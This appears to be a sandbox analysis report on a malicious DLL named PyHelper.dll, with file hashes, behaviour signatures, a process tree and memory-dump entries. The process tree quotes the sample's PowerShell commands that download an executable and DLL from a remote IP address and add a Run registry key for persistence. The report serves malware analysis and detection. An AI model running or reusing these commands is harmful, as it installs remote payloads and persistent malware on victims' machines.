Analysis
-
max time kernel
727s -
max time network
1596s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
11-05-2024 10:41
General
-
Target
PyHelper.dll
-
Size
236KB
-
MD5
b7bd2243978cfe44cc0d4b28086c4004
-
SHA1
bbc0f43de71cddc0a1be48fa98b936ebffb817ac
-
SHA256
bfeaf1fe93923425053e245e2ccefae72a65f75edad1f1689c55c4f0a1e84455
-
SHA512
e7f924564bcf1a6173cf29bbbcb16994b3e527a93c1059e7be8e86aa5f5887a852a6a9084862caf3e192a5a70336e6ee22bc169c1f1e0300fa72bb9049a0141f
-
SSDEEP
3072:aSro30CSFTVOo7qzijtY7HBGsBel05YGoAgbceBBCxRXu+E+NO9o6Kgv:akoELH7k8tY7HkLljr1CTbE55
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Powershell Invoke Web Request.
-
Downloads MZ/PE file
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 14 IoCs
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\PyHelper.dll1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\RuntimeBroker.exeRuntimeBroker.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/chrome_elf.dll" -OutFile "$env:USERPROFILE\Documents\chrome_elf.dll""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/chrome.exe" -OutFile "$env:USERPROFILE\Documents\chrome.exe""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-C "Invoke-WebRequest -Uri "http://62.133.61.130:80/files/addons/105.0.5195.102.manifest" -OutFile "$env:USERPROFILE\Documents\105.0.5195.102.manifest""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-C "New-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "update" -Value "$env:USERPROFILE\Documents\chrome.exe" -PropertyType "String" -Force"3⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD55d574dc518025fad52b7886c1bff0e13
SHA168217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA51221de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c2a0895dd601c9bfa22352c472c6fc5a
SHA1e9ecd26c4c3333d9dcaee95dff114813af7a9eaf
SHA256ad05818cdd39080d26c75b3260d38a31e991f81c23b5ed34e1fe7f2f2a61a10a
SHA5128e2ecc93e19c445e2f3a97912e101180f5a9e46099cb112993f75758525f0d9cf33feb89d128eb94075bf53f42c9f253100380eb5c71f6581f4b4fa2344205c4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
536B
MD5d908fa4be1a0ccf57ba13cad033901c7
SHA1847ab3b123c95ff7c6ff66ce4e64e2a0fc746ca7
SHA25653225ff1ab4c6afd787c84b7110cd20e9ff59158cca86451c5991d2bb4f6611e
SHA5128e9c43705197be93f700752fdbcaa25d3d8c60e8a2a78e9cc09591fbe0bad60c2715cf1bc8e8cc323657eda701858125466e042bb4a8010e9443a213e81a6ac4
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqnbx2jr.wkl.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
memory/208-5-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/208-6-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/208-4-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/208-12-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/208-20-0x0000000062540000-0x0000000062598000-memory.dmpFilesize
352KB
-
memory/1616-51-0x0000021CC1020000-0x0000021CC1042000-memory.dmpFilesize
136KB
-
memory/2544-9-0x000001D49A060000-0x000001D49A061000-memory.dmpFilesize
4KB
-
memory/2544-24-0x000001D49A090000-0x000001D49A0AD000-memory.dmpFilesize
116KB
-
memory/2544-23-0x00007FFDED465000-0x00007FFDED466000-memory.dmpFilesize
4KB
-
memory/2544-13-0x000001D49A030000-0x000001D49A04A000-memory.dmpFilesize
104KB
-
memory/2544-14-0x000001D49A090000-0x000001D49A0AD000-memory.dmpFilesize
116KB
-
memory/2544-10-0x00007FFDED465000-0x00007FFDED466000-memory.dmpFilesize
4KB
-
memory/2544-8-0x000001D49A050000-0x000001D49A051000-memory.dmpFilesize
4KB
-
memory/3064-54-0x0000028555720000-0x0000028555796000-memory.dmpFilesize
472KB